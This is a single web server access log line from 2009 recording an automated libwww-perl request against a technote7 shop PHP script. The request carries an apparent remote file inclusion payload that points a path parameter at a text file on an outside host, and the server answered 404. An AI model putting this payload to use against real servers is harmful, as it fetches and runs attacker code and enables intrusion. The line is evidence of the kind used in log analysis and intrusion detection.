91.93.97.106 - - [07/Mar/2009:08:25:27 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
